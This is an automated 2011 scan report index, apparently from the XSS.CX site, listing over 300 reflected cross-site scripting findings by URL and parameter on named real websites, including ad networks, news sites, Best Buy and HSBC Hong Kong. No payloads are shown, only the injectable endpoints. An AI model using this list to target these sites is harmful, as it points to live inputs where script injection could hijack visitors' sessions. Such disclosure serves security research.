XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10052011-03

Report generated by XSS.CX at Wed Oct 05 10:34:16 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [REST URL parameter 2]

1.2. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [REST URL parameter 3]

1.3. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [name of an arbitrarily supplied request parameter]

1.4. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [sz parameter]

1.5. http://a.collective-media.net/cmadj/ns.informit/homepage [REST URL parameter 2]

1.6. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [REST URL parameter 1]

1.7. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [REST URL parameter 2]

1.8. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [REST URL parameter 3]

1.9. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [sz parameter]

1.10. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [dcove parameter]

1.11. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [key parameter]

1.12. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [message parameter]

1.13. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [redirectURL parameter]

1.14. http://ad.turn.com/server/pixel.htm [fpid parameter]

1.15. http://ad.turn.com/server/pixel.htm [sp parameter]

1.16. http://adage.com//images/save-and-share-icons/icon-digg.png [REST URL parameter 1]

1.17. http://adage.com//images/save-and-share-icons/icon-digg.png [REST URL parameter 2]

1.18. http://adage.com//images/save-and-share-icons/icon-digg.png [REST URL parameter 3]

1.19. http://adage.com//images/save-and-share-icons/icon-facebook.png [REST URL parameter 1]

1.20. http://adage.com//images/save-and-share-icons/icon-facebook.png [REST URL parameter 2]

1.21. http://adage.com//images/save-and-share-icons/icon-facebook.png [REST URL parameter 3]

1.22. http://adage.com//images/save-and-share-icons/icon-google.png [REST URL parameter 1]

1.23. http://adage.com//images/save-and-share-icons/icon-google.png [REST URL parameter 2]

1.24. http://adage.com//images/save-and-share-icons/icon-google.png [REST URL parameter 3]

1.25. http://adage.com//images/save-and-share-icons/icon-linkedin.png [REST URL parameter 1]

1.26. http://adage.com//images/save-and-share-icons/icon-linkedin.png [REST URL parameter 2]

1.27. http://adage.com//images/save-and-share-icons/icon-linkedin.png [REST URL parameter 3]

1.28. http://adage.com//images/save-and-share-icons/icon-netvibes.png [REST URL parameter 1]

1.29. http://adage.com//images/save-and-share-icons/icon-netvibes.png [REST URL parameter 2]

1.30. http://adage.com//images/save-and-share-icons/icon-netvibes.png [REST URL parameter 3]

1.31. http://adage.com//images/save-and-share-icons/icon-newsvine.png [REST URL parameter 1]

1.32. http://adage.com//images/save-and-share-icons/icon-newsvine.png [REST URL parameter 2]

1.33. http://adage.com//images/save-and-share-icons/icon-newsvine.png [REST URL parameter 3]

1.34. http://adage.com//images/save-and-share-icons/icon-reddit.png [REST URL parameter 1]

1.35. http://adage.com//images/save-and-share-icons/icon-reddit.png [REST URL parameter 2]

1.36. http://adage.com//images/save-and-share-icons/icon-reddit.png [REST URL parameter 3]

1.37. http://adage.com//images/save-and-share-icons/icon-stumbleupon.png [REST URL parameter 1]

1.38. http://adage.com//images/save-and-share-icons/icon-stumbleupon.png [REST URL parameter 2]

1.39. http://adage.com//images/save-and-share-icons/icon-stumbleupon.png [REST URL parameter 3]

1.40. http://adage.com//images/save-and-share-icons/icon-twitter.png [REST URL parameter 1]

1.41. http://adage.com//images/save-and-share-icons/icon-twitter.png [REST URL parameter 2]

1.42. http://adage.com//images/save-and-share-icons/icon-twitter.png [REST URL parameter 3]

1.43. http://adage.com//images/save-and-share-icons/icon-windows-live.png [REST URL parameter 1]

1.44. http://adage.com//images/save-and-share-icons/icon-windows-live.png [REST URL parameter 2]

1.45. http://adage.com//images/save-and-share-icons/icon-windows-live.png [REST URL parameter 3]

1.46. http://adage.com//images/save-and-share-icons/icon-yahoo.png [REST URL parameter 1]

1.47. http://adage.com//images/save-and-share-icons/icon-yahoo.png [REST URL parameter 2]

1.48. http://adage.com//images/save-and-share-icons/icon-yahoo.png [REST URL parameter 3]

1.49. http://adage.com//images/save-and-share-icons/netlog.png [REST URL parameter 1]

1.50. http://adage.com//images/save-and-share-icons/netlog.png [REST URL parameter 2]

1.51. http://adage.com//images/save-and-share-icons/netlog.png [REST URL parameter 3]

1.52. http://adage.com//images/save-and-share-icons/orkut.png [REST URL parameter 1]

1.53. http://adage.com//images/save-and-share-icons/orkut.png [REST URL parameter 2]

1.54. http://adage.com//images/save-and-share-icons/orkut.png [REST URL parameter 3]

1.55. http://adage.com//images/save-and-share-icons/viadeo.png [REST URL parameter 1]

1.56. http://adage.com//images/save-and-share-icons/viadeo.png [REST URL parameter 2]

1.57. http://adage.com//images/save-and-share-icons/viadeo.png [REST URL parameter 3]

1.58. http://adage.com//images/save-and-share-icons/xing.png [REST URL parameter 1]

1.59. http://adage.com//images/save-and-share-icons/xing.png [REST URL parameter 2]

1.60. http://adage.com//images/save-and-share-icons/xing.png [REST URL parameter 3]

1.61. http://adage.com/ajax/get_comments.php [REST URL parameter 1]

1.62. http://adage.com/ajax/get_comments.php [REST URL parameter 2]

1.63. http://adage.com/ajax/get_comments.php [article_id parameter]

1.64. http://adage.com/ajax/get_comments.php [name of an arbitrarily supplied request parameter]

1.65. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [REST URL parameter 1]

1.66. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [REST URL parameter 4]

1.67. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [name of an arbitrarily supplied request parameter]

1.68. http://adage.com/css/style.css [REST URL parameter 1]

1.69. http://adage.com/css/style.css [REST URL parameter 2]

1.70. http://adage.com/favicon.ico [REST URL parameter 1]

1.71. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 1]

1.72. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 2]

1.73. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 3]

1.74. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 4]

1.75. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 5]

1.76. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 1]

1.77. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 2]

1.78. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 3]

1.79. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 4]

1.80. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 5]

1.81. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 1]

1.82. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 2]

1.83. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 3]

1.84. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 4]

1.85. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 5]

1.86. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 1]

1.87. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 2]

1.88. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 3]

1.89. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 4]

1.90. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 1]

1.91. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 2]

1.92. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 3]

1.93. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 4]

1.94. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 1]

1.95. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 2]

1.96. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 3]

1.97. http://adage.com/images/bottom/menus/datacenter.png [REST URL parameter 4]

1.98. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 1]

1.99. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 2]

1.100. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 3]

1.101. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 4]

1.102. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 1]

1.103. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 2]

1.104. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 3]

1.105. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 4]

1.106. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 1]

1.107. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 2]

1.108. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 3]

1.109. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 4]

1.110. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 1]

1.111. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 2]

1.112. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 3]

1.113. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 4]

1.114. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 1]

1.115. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 2]

1.116. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 3]

1.117. http://adage.com/images/bottom/menus/mediaworks.png [REST URL parameter 4]

1.118. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 1]

1.119. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 2]

1.120. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 3]

1.121. http://adage.com/images/bottom/menus/small_agency_awards.png [REST URL parameter 4]

1.122. http://adage.com/images/covers/current_thumb.jpg [REST URL parameter 1]

1.123. http://adage.com/images/covers/current_thumb.jpg [REST URL parameter 2]

1.124. http://adage.com/images/covers/current_thumb.jpg [REST URL parameter 3]

1.125. http://adage.com/images/menus/menu_image_9.png [REST URL parameter 1]

1.126. http://adage.com/images/menus/menu_image_9.png [REST URL parameter 2]

1.127. http://adage.com/images/menus/menu_image_9.png [REST URL parameter 3]

1.128. http://adage.com/images/rss.gif [REST URL parameter 1]

1.129. http://adage.com/images/rss.gif [REST URL parameter 2]

1.130. http://adage.com/scripts/aa-jquery.js [REST URL parameter 1]

1.131. http://adage.com/scripts/aa-jquery.js [REST URL parameter 2]

1.132. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css [REST URL parameter 1]

1.133. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css [REST URL parameter 2]

1.134. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css [REST URL parameter 3]

1.135. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js [REST URL parameter 1]

1.136. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js [REST URL parameter 2]

1.137. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js [REST URL parameter 3]

1.138. http://adage.com/scripts/javascript.js [REST URL parameter 1]

1.139. http://adage.com/scripts/javascript.js [REST URL parameter 2]

1.140. http://adage.com/scripts/jquery.easing.1.3.js [REST URL parameter 1]

1.141. http://adage.com/scripts/jquery.easing.1.3.js [REST URL parameter 2]

1.142. http://adage.com/scripts/jquery.onefblikev1.1.js [REST URL parameter 1]

1.143. http://adage.com/scripts/jquery.onefblikev1.1.js [REST URL parameter 2]

1.144. http://adage.com/scripts/jquery.onefblikev1.2.js [REST URL parameter 1]

1.145. http://adage.com/scripts/jquery.onefblikev1.2.js [REST URL parameter 2]

1.146. http://adage.com/scripts/lib.js [REST URL parameter 1]

1.147. http://adage.com/scripts/lib.js [REST URL parameter 2]

1.148. http://adage.com/scripts/sniff.js [REST URL parameter 1]

1.149. http://adage.com/scripts/sniff.js [REST URL parameter 2]

1.150. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

1.151. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

1.152. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

1.153. http://admeld.adnxs.com/usersync [admeld_callback parameter]

1.154. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

1.155. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

1.156. http://adsfac.us/ag.asp [cc parameter]

1.157. http://api.active.com/REST/ZipDma/zip/75244 [callback parameter]

1.158. http://api.active.com/REST/geotargeting/handler.ashx [callback parameter]

1.159. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [REST URL parameter 1]

1.160. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [REST URL parameter 2]

1.161. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [callback parameter]

1.162. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [name of an arbitrarily supplied request parameter]

1.163. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [pageSize parameter]

1.164. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [show parameter]

1.165. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [REST URL parameter 1]

1.166. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [REST URL parameter 2]

1.167. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [callback parameter]

1.168. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [name of an arbitrarily supplied request parameter]

1.169. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [pageSize parameter]

1.170. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [show parameter]

1.171. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

1.172. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

1.173. http://api.demandbase.com/api/v2/ip.js [var parameter]

1.174. http://api.viglink.com/api/ping [REST URL parameter 2]

1.175. http://api.viglink.com/api/ping [jsonp parameter]

1.176. http://assets.nydailynews.com/favicon.ico [REST URL parameter 1]

1.177. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 1]

1.178. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 2]

1.179. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 3]

1.180. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 4]

1.181. http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 5]

1.182. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 1]

1.183. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 2]

1.184. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 3]

1.185. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 4]

1.186. http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 5]

1.187. http://assets.nydailynews.com/video/homepage_video.html [REST URL parameter 1]

1.188. http://assets.nydailynews.com/video/homepage_video.html [REST URL parameter 2]

1.189. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.190. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.191. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.192. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.193. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.194. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.195. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.196. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.197. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [REST URL parameter 3]

1.198. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [callback parameter]

1.199. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [callbackArgument parameter]

1.200. http://bid.openx.net/json [c parameter]

1.201. http://brocade.netshelter.net/fixed_placement.js.php [name of an arbitrarily supplied request parameter]

1.202. http://brocade.netshelter.net/fixed_placement.js.php [publisher parameter]

1.203. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

1.204. http://cdn.widgetserver.com/syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/ [REST URL parameter 14]

1.205. http://cdn.widgetserver.com/syndication/json/i/0af9a1cd-4b43-48bc-a3f0-e5c9c11d9d30/iv/2/p/3/r/63b0a2eb-de86-438e-a586-0b38939f7284/rv/21/t/b28da3e5e5ab51d97f97b8ac3fcf539c514d3b1300000132154e4134/u/3/ [REST URL parameter 4]

1.206. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

1.207. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

1.208. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

1.209. http://content.atomz.com/autocomplete/sp10/04/3b/7b/ [callback parameter]

1.210. http://content.bestbuyon.com/solr/select/ [callback parameter]

1.211. http://content.bestbuyon.com/solr/select/ [fl parameter]

1.212. http://content.bestbuyon.com/solr/select/ [indent parameter]

1.213. http://content.bestbuyon.com/solr/select/ [json.wrf parameter]

1.214. http://content.bestbuyon.com/solr/select/ [name of an arbitrarily supplied request parameter]

1.215. http://content.bestbuyon.com/solr/select/ [q parameter]

1.216. http://crm.rightnow.com/app/utils/simple_create_account/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php [REST URL parameter 5]

1.217. http://crm.rightnow.com/app/utils/simple_login_form/p_sso/http%253A%252F%252Fwww.rightnow.com%252Fsso-thanks.php [REST URL parameter 5]

1.218. http://drh.img.digitalriver.com/DRHM/store [Action parameter]

1.219. http://drh.img.digitalriver.com/store [Action parameter]

1.220. http://ebay.adnxs.com/ttj [pt1 parameter]

1.221. http://ebay.adnxs.com/ttj [pt2 parameter]

1.222. http://ebay.adnxs.com/ttj [pt3 parameter]

1.223. http://events.nydailynews.com/json [jsonsp parameter]

1.224. http://events.nydailynews.com/json [st parameter]

1.225. http://events.nydailynews.com/partner_json/search [image_size parameter]

1.226. http://events.nydailynews.com/partner_json/search [jsonsp parameter]

1.227. http://events.nydailynews.com/partner_json/search [st parameter]

1.228. http://events.nydailynews.com/partner_json/search [when parameter]

1.229. http://exacttarget.tt.omtrdc.net/m2/exacttarget/mbox/standard [mbox parameter]

1.230. http://feeds.delicious.com/v2/js/awsbuzz [count parameter]

1.231. http://feeds.delicious.com/v2/js/awsbuzz [icon parameter]

1.232. http://feeds.delicious.com/v2/js/awsbuzz [name of an arbitrarily supplied request parameter]

1.233. http://feeds.delicious.com/v2/js/awsbuzz [sort parameter]

1.234. http://feeds.delicious.com/v2/js/awsbuzz [title parameter]

1.235. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 2]

1.236. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 3]

1.237. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 4]

1.238. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 5]

1.239. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 6]

1.240. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 7]

1.241. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [name of an arbitrarily supplied request parameter]

1.242. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [sz parameter]

1.243. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 2]

1.244. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 3]

1.245. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 4]

1.246. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [REST URL parameter 5]

1.247. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [aid parameter]

1.248. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [c parameter]

1.249. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [cid parameter]

1.250. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [h parameter]

1.251. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [js parameter]

1.252. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [name of an arbitrarily supplied request parameter]

1.253. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [pid parameter]

1.254. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [plc parameter]

1.255. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [w parameter]

1.256. http://ib.adnxs.com/ptj [redir parameter]

1.257. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [imp_rvr_id parameter]

1.258. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [mpck parameter]

1.259. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [mpvc parameter]

1.260. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [imp_rvr_id parameter]

1.261. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [mpck parameter]

1.262. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [mpvc parameter]

1.263. http://intensedebate.com/js/getCommentCounts.php [REST URL parameter 2]

1.264. http://intensedebate.com/js/wordpressTemplateLinkWrapper2.php [REST URL parameter 2]

1.265. http://intensedebate.com/remoteVisit.php [REST URL parameter 1]

1.266. http://interface.q-go.net/rightnow/index.php [q parameter]

1.267. http://ips-invite.iperceptions.com/webValidator.aspx [cD parameter]

1.268. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]

1.269. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]

1.270. http://js.revsci.net/gateway/gw.js [csid parameter]

1.271. http://mads.techrepublic.com/mac-ad [ADREQ&beacon parameter]

1.272. http://mads.techrepublic.com/mac-ad [PAGESTATE parameter]

1.273. http://mads.techrepublic.com/mac-ad [SITE parameter]

1.274. http://ndparking.com/serve.php [REST URL parameter 1]

1.275. http://ndparking.com/serve.php [dn parameter]

1.276. http://ndparking.com/serve.php [name of an arbitrarily supplied request parameter]

1.277. http://oee.sandals.com/includes/calendar/formCalendar.cfm [targetRow parameter]

1.278. http://oee.sandals.com/includes/calendar/formCalendar.cfm [the_field parameter]

1.279. http://orders.allmenus.com/content/dfp.asp [position parameter]

1.280. http://origin.collective-media.net/adj/ns.informit/homepage [REST URL parameter 2]

1.281. http://origin.collective-media.net/adj/ns.informit/homepage [REST URL parameter 3]

1.282. http://origin.collective-media.net/adj/ns.informit/homepage [name of an arbitrarily supplied request parameter]

1.283. http://origin.collective-media.net/adj/ns.informit/homepage [ppos parameter]

1.284. http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5461951393721719569 [hl parameter]

1.285. http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5461951393721719569 [kind parameter]

1.286. http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5547732855143429377 [hl parameter]

1.287. http://picasaweb.google.com/data/feed/api/user/117176959269632963044/albumid/5547732855143429377 [kind parameter]

1.288. http://pixel.adsafeprotected.com/jspix [anId parameter]

1.289. http://pixel.adsafeprotected.com/jspix [campId parameter]

1.290. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

1.291. http://pixel.adsafeprotected.com/jspix [pubId parameter]

1.292. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

1.293. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

1.294. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

1.295. http://r.turn.com/server/pixel.htm [fpid parameter]

1.296. http://r.turn.com/server/pixel.htm [sp parameter]

1.297. http://rbisaleschallenge.wpunj.edu/home/assets/player.swf [REST URL parameter 1]

1.298. http://rbisaleschallenge.wpunj.edu/home/assets/player.swf [REST URL parameter 2]

1.299. http://rbisaleschallenge.wpunj.edu/home/assets/player.swf [REST URL parameter 3]

1.300. http://rbisaleschallenge.wpunj.edu/home/assets/playlist.xml [REST URL parameter 1]

1.301. http://rbisaleschallenge.wpunj.edu/home/assets/playlist.xml [REST URL parameter 2]

1.302. http://rbisaleschallenge.wpunj.edu/home/assets/playlist.xml [REST URL parameter 3]

1.303. http://realtime.active.com/widget/active_home [callback parameter]

1.304. http://restaurants.nydailynews.com/geocode/ [addressfull parameter]

1.305. http://rok.com.com/rok-get [app_handle parameter]

1.306. http://rok.com.com/rok-get [name of an arbitrarily supplied request parameter]

1.307. http://rok.com.com/rok-get [site parameter]

1.308. http://rok.com.com/rok-get [unit_sp parameter]

1.309. http://s25.sitemeter.com/js/counter.asp [site parameter]

1.310. http://s25.sitemeter.com/js/counter.js [site parameter]

1.311. http://services.digg.com/1.0/endpoint [callback parameter]

1.312. http://services.digg.com/1.0/endpoint [method parameter]

1.313. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]

1.314. http://services.digg.com/1.0/endpoint [type parameter]

1.315. http://wd.sharethis.com/api/getCount2.php [cb parameter]

1.316. http://widgets.active.com/widgets/nearyou/search [cb parameter]

1.317. http://widgets.digg.com/buttons/count [url parameter]

1.318. http://www.businesswire.com/news/home/20110606006390/en/eBay-Agrees-Acquire-Magento [REST URL parameter 3]

1.319. http://www.businesswire.com/news/home/20110606006390/en/eBay-Agrees-Acquire-Magento [REST URL parameter 4]

1.320. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_input.hidden_rf parameter]

1.321. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_input.peopletravelling parameter]

1.322. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_number_of_children parameter]

1.323. http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4! [PC_7_1_CKB_number_of_rf parameter]

